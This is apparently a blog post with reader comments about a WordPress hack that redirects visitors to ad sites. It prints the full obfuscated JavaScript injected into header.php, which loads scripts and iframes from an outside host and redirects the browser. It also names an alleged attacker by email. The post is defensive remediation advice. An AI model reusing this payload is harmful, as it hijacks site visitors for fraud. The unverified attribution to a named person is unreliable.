There is a brand new WordPress hack attack making the rounds, that redirects all traffic to your site through itsallbreaksoft.net and paymoneysystem.info, and then on to any number of junk sites full of ads. The intermediate redirect to paymoneysystem.info actually goes through the URL paymoneysystem.info/in.cgi?michaeleknowlton, suggesting that someone using the name Michael Knowlton is going to be benefiting from any monies earned by the advertising. Here’s how it was done, and how to fix it. Fortunately, the immediate fix is very easy.
Here is how it was done – the bad guys either injected the below code into the header.php file (this is found in your /wp-content/themes/{your theme name here}/ directory) – or they simply sucked down your header file, modified it on their end to include the below code, and then overwrote your header.php file with the newly modified one.
This is the code that has been added to your header.php file:
script language=javascript>document.write(unescape(‘%3C%73%63%72%69
%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72
%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B
%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75
%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B
%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C
%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72
%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E
%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73
%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F
%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70
%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E’));dF(‘%
264Dtdsjqu%264Fepdvnfou/xsjuf%2639%2633%264Dtdsjqu%2631tsd%
264E%266D%2633%2633%2C%2633iuuq%264B00jutbmmcsfbltpgu/
ofu0uet0jo/dhj%264G3%2637tfpsfg%264E%2633%
2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%
2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%
264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou
%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%
264Eopuefgjof%2633%2C%2633%266D%2633%264F%264D%266D0tdsjqu%
264F%2633%263%3A%264C%264D0tdsjqu%264F%261B%264Dtdsjqu%264F%
261Bjg%2639uzqfpg%2639i%263%3A%264E%264E%2633voefgjofe%2633%
263%3A%268C%261%3A%261B%261%3Aepdvnfou/xsjuf%2639%2633%
264Djgsbnf%2631tsd%264E%2638iuuq%264B00jutbmmcsfbltpgu/
ofu0uet0jo/dhj%264G4%2637tfpsfg%264E%2633%
2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%
2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%
264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou
%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%
264Eopuefgjof%2638%2631xjeui%264E2%2631ifjhiu%264E2%
2631cpsefs%264E1%2631gsbnfcpsefs%264E1%264F%264D0jgsbnf%264F
%2633%263%3A%264C%2631%261B%268E%261Bfmtf%2631jg%2639i/
joefyPg%2639%2633iuuq%264B%2633%263%3A%264E%264E1%263%3A%
268C%261B%261%3A%261%3Axjoepx/mpdbujpo%264Ei%264C%261B%268E%
261B%264D0tdsjqu%264F1’)
This is gobbeldygook actually resolves to a script that redirects your visitors to itsallbreaksoft.net and on to paymoneysystem.info, through “Michael Knowlton’s” affiliate i.d..
The Internet Patrol is completely free, and reader-supported. Your tips via CashApp, Venmo, or Paypal are appreciated! Receipts will come from ISIPP.
CashApp us
Venmo us
Paypal us
To perform an immediate fix, simply remove the code from your header.php file, and then make sure that your header.php file isn’t writable by anyone other than you.
It turns out that the people behind this seem to be a pretty well-known group from Russia, with the main person being one Sergey Ryabov, who uses the email address director@climbing-games.com. [Ed. Note: We’d love to talk with Mr. Ryabov, to learn more about his operations and how and why he’s able to pull off this kind of hijinx.]
As to how they were able to do this, it’s not yet clear, but if you are running an old version of WordPress – especially a 2.6x version – be sure to upgrade if at all possible.
We also were recently turned onto a great WordPress firewall plugin that is very small and very easy to install, and you can check out the WordPress Firewall plugin here.
The Internet Patrol is completely free, and reader-supported. Your tips via CashApp, Venmo, or Paypal are appreciated! Receipts will come from ISIPP.
CashApp us
Venmo us
Paypal us
Hi,
I have a similar thing happening with my WordPress site. I’ve so far removed a whole lot of gobbeldygook from header.php, footer.php, index.php, page.php etc etc. It looks like they have left their mess on every page. Nothing in my uploads as far as I can see. Will try to resolve it. I noted that this unusual URL was in the bottom part of my index page: http://nowisisdudescars dot com/js.php
Any thoughts? Thanks :)
Thank you very much, It works now. You solved my problem!
Does it happen on google blogger? if so is the something to stop it?
Thank you very much, my blog was attacked this morning by this hacker and I did what you told and it´s Ok now
Fernanda
Yeah, I was hacked too. Have saved the code by the way, because hacking back is legal in Holland :)
Thanks, this is a great help.
I had 2 admins on there, god knows how, as I didnt create it and he had this long javascript link in his profle on this admin, ive changed all my pws now, god knows how they did it !
Woc
Thanks a lo. This was bugging my blog a lot. Now it’s gone
I, too, had this happen. Googled the redirect domain, clicked the first listing and came straight to this page – carried out the advice and was back in business in 2 minutes. Thanks! As Anne suggested, I also checked my uploads folder and found a file called 928990.php, which was inserted way back on Sept. 23, 2009 – and yet my page didn’t go down until today or yesterday (I was alerted by the sudden lack of spam posts, ironically!)
Checked the permissions on header.php – guess what? Read, Write and Execute permissions are set to “Owner” only. Somehow this hack must convince the server that the hacker is the “Owner”. Scary. Will check my database also, but can’t get access just now – my service provider has screwed up my service level again.
Thanks again everyone!
~Wendy
Many thanks for this post, as I wondered what the hell was happening with my blog, many thanks again !!!
Woc
THANK YOU! You just saved my blog :). i was hit on February 4th, apparently, but just noticed a few days ago and thought it was a temporary DNS glitch. BTW: (chmod -r header.php) doesn’t hurt!
I had an extra .php file in my uploads folder for 9/2009. Does it mean the website was infected already then??
Like you said: check the uploads folder, in my case there were some dodgy php files. Alse check the users of your blog, there was one unknown admin in my list.
How did he get there??
How to remove Trojan: Backdoor
https://web.archive.org/web/20130127145531/http://www.tips29.com/2009/01/how-to-remove-trojan-backdoor.html
Thanks for sharing this info. This will help alot of people solve this problem. Be sure when removing all the code that you also take every precaution that you can to secure your WordPress site, including very strong passwords (hosting account, ftp, and wp-admin), updates, permissions, and use SFTP when uploading. Don’t forget to do daily backups too!
To answer DBEV, unless you have direct access to your server you can’t chmod (change permissions) on any file with ‘commands’. You need to FTP into the server and use the FTP client to set permission for this file. You can see the read, write and execute permissions depending on your FTP client.
I just went and fixed this. I think. If this has happened to you, CHECK YOUR UPLOADS FOLDER. Check them all. I found a file named ‘845530.php’ in one of these directories.
After decoding, it appears to be a backdoor file letting them, among other things, email themselves your SQL DB (I’m not 100% sure on that point; I’ve only glanced over the code). However, it’s VERYVERY bad. Upgrade, check for that PHP file and delete any users (especially admin users) that you don’t recognize.
THANK YOU! I was afraid I was going to have to reinstall everything and I am SO glad I found your fix! Shared on FB and twitter to all my tech savvy friends!
Also make sure to check the user table (directly in the database). I had a new admin in there with javascript as name which hid it from the user list.
It stills bothers me though that I don’t know how he got in there in the first place.
Thank you so much for this post. I host a web blog for an elementary school and a lot of those redirects were definitely NOT kid appropriate. You saved me from a ton of angry emails from parents.
Thanks for your help! Youve been the first realiable source for the solution of the problem. Therefore you saved three servers. The infection occured on Feburary, the 5th at 6pm in Germany. Do you know anything about the origin?
Greatings from from an little village near Hamburg,
HP
Thank you for this info. Deleted the content and it appears to have been fixed. Haven’t seen any redirects.
My question is based on your recommendation “…make sure that your header.php file isn’t writable by anyone other than you.” I can’t find commands to enable me to do that. Suggestions?
Thank you, thank you, thank you.
Almost lost my mind. But there seems to be more. Script removed, the redirect is delayed, but still goes.